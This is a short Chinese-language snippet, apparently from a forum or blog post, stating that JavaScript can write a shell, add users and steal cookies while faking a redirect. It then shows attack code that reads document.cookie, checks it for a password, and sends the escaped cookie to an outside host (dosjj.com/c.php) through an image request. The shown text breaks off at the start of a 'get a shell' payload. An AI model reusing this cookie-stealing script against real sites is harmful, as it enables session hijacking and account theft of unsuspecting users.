Js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向 xmlhttp=poster(); cookie=document.cookie; login=cookie.indexOf(‘password’)==-1?0:1; tolocation=’https://www.jb51.net/’; //get cookie x=new Image(); x.src=”www.dosjj.com/c.php?c=”+escape(document.cookie); //get a shell data=”txaContent=